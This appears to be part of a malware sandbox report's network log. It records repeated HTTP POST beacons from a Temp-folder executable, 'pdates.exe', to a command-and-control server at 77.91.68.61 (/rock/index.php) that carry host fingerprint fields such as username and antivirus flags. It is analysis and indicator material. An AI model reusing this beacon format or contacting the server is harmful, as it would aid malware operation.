Jul 27, 2023 01:35:17.589888096 CEST	4130	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
505	192.168.2.5	50226	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:17.765944004 CEST	4130	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:17.814007044 CEST	4131	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
506	192.168.2.5	50227	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:17.978847027 CEST	4131	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:18.027101040 CEST	4132	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
507	192.168.2.5	50228	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:18.195631027 CEST	4132	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:18.245976925 CEST	4133	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
508	192.168.2.5	50229	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:18.424273014 CEST	4133	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:18.472374916 CEST	4133	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
509	192.168.2.5	50230	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:18.643733978 CEST	4134	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:18.692344904 CEST	4134	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.5	49768	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:17.016721964 CEST	2896	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:17.064950943 CEST	2896	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
510	192.168.2.5	50231	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:18.870064974 CEST	4135	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:18.918440104 CEST	4135	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
511	192.168.2.5	50232	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:19.084121943 CEST	4136	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:19.132457972 CEST	4136	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
512	192.168.2.5	50233	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:19.334778070 CEST	4137	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:19.382735014 CEST	4137	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
513	192.168.2.5	50234	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:19.549849033 CEST	4138	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:19.597611904 CEST	4138	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
514	192.168.2.5	50235	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:19.751789093 CEST	4139	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:19.799609900 CEST	4139	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
515	192.168.2.5	50236	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:19.994446993 CEST	4140	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:20.042469025 CEST	4140	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
516	192.168.2.5	50237	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:20.206727982 CEST	4141	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:20.255670071 CEST	4141	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
517	192.168.2.5	50238	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:20.418353081 CEST	4142	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:20.468615055 CEST	4142	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
518	192.168.2.5	50239	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:20.639779091 CEST	4143	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:20.688613892 CEST	4143	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
519	192.168.2.5	50240	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:20.887074947 CEST	4144	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:20.938298941 CEST	4144	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.5	49769	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:17.497637033 CEST	2897	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:17.547416925 CEST	2897	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
520	192.168.2.5	50241	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:21.108525991 CEST	4145	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:21.160372019 CEST	4145	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
521	192.168.2.5	50242	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:21.341850996 CEST	4146	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:21.390665054 CEST	4146	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
522	192.168.2.5	50243	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:21.581129074 CEST	4147	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:21.629724026 CEST	4147	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
523	192.168.2.5	50244	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:21.793728113 CEST	4147	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:21.842089891 CEST	4148	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
524	192.168.2.5	50245	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:22.035578966 CEST	4148	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:22.084193945 CEST	4149	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
525	192.168.2.5	50246	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:22.260360003 CEST	4149	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:22.308937073 CEST	4150	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
526	192.168.2.5	50247	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
